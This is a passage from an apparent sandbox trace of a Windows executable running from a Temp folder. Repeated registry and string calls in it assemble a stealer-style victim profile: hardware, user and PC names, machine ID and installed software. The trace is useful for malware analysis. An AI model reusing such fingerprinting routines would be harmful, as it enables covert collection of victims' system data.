C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\n" [0175.885] RegCloseKey (hKey=0x354) returned 0x0 [0175.885] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x1f, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0016-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.885] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0016-0409-0000-0000000FF1CE}") returned 90 [0175.885] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0016-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.885] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Excel MUI (English) 2016", lpcbData=0x197fd4*=0x23) returned 0x0 [0175.910] lstrlenA (lpString="Microsoft Excel MUI (English) 2016") returned 34 [0175.910] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft Excel MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016" [0175.910] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="16.0.4266.1001", lpcbData=0x197fd4*=0xf) returned 0x0 [0175.911] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 " [0175.911] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 ", lpString2="16.0.4266.1001" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001" [0175.911] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\n" [0175.911] RegCloseKey (hKey=0x354) returned 0x0 [0175.911] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x20, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90160000-0018-0409-0000-0000000FF1CE}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.911] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0018-0409-0000-0000000FF1CE}") returned 90 [0175.911] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{90160000-0018-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.911] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft PowerPoint MUI (English) 2016", lpcbData=0x197fd4*=0x28) returned 0x0 [0175.911] lstrlenA (lpString="Microsoft PowerPoint MUI (English) 2016") returned 39 [0175.911] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\n", lpString2="Microsoft PowerPoint MUI (English) 2016" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display 